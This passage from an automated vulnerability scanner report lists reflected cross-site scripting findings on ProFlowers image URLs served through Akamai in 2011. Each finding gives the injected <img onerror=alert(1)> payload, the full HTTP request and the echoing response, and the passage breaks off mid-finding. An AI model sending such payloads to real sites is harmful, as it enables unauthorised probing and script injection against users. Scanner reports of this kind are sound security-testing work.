
Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34 was submitted in the REST URL parameter 9. This input was echoed as 3e084<img src=a onerror=alert(1)>6d551d44b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img src=a onerror=alert(1)>6d551d44b34

1.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97 was submitted in the REST URL parameter 9. This input was echoed as 360ac<img src=a onerror=alert(1)>d12f5cff97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/Damask_AC360ac<img src=a onerror=alert(1)>d12f5cff97

1.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72 was submitted in the REST URL parameter 9. This input was echoed as 809b9<img src=a onerror=alert(1)>db4c58a7a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn809b9<img src=a onerror=alert(1)>db4c58a7a72

1.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de was submitted in the REST URL parameter 9. This input was echoed as 70245<img src=a onerror=alert(1)>3f5fb4274de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu11_PF70245<img src=a onerror=alert(1)>3f5fb4274de

1.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e was submitted in the REST URL parameter 9. This input was echoed as 58380<img src=a onerror=alert(1)>53b2f6a2f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF58380<img src=a onerror=alert(1)>53b2f6a2f5e

1.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5 was submitted in the REST URL parameter 9. This input was echoed as 85dbd<img src=a onerror=alert(1)>62480e56d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_dmsk11_PF85dbd<img src=a onerror=alert(1)>62480e56d5

1.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3 was submitted in the REST URL parameter 9. This input was echoed as 58a40<img src=a onerror=alert(1)>eed651848d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img src=a onerror=alert(1)>eed651848d3

1.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e was submitted in the REST URL parameter 9. This input was echoed as c75a4<img src=a onerror=alert(1)>d12803aeb3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img src=a onerror=alert(1)>d12803aeb3e

1.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e was submitted in the REST URL parameter 9. This input was echoed as 733a8<img src=a onerror=alert(1)>699c828870e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img src=a onerror=alert(1)>699c828870e

1.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6 was submitted in the REST URL parameter 9. This input was echoed as 2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6

1.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e was submitted in the REST URL parameter 9. This input was echoed as 6a737<img src=a onerror=alert(1)>47eeba19c2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQithasitall_rbye10_PF6a737<img src=a onerror=alert(1)>47eeba19c2e

1.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d was submitted in the REST URL parameter 9. This input was echoed as e3afe<img src=a onerror=alert(1)>9e93c1e129d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img src=a onerror=alert(1)>9e93c1e129d

1.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb was submitted in the REST URL parameter 9. This input was echoed as a76a3<img src=a onerror=alert(1)>b2c254cdacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PFa76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet11_PFa76a3<img src=a onerror=alert(1)>b2c254cdacb

1.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef was submitted in the REST URL parameter 9. This input was echoed as 995b4<img src=a onerror=alert(1)>39f37b6a9ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img src=a onerror=alert(1)>39f37b6a9ef

1.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967 was submitted in the REST URL parameter 9. This input was echoed as d7a61<img src=a onerror=alert(1)>2d0b0eab967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img src=a onerror=alert(1)>2d0b0eab967

1.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF [REST URL parameter 9]

Summary

Severity:   High
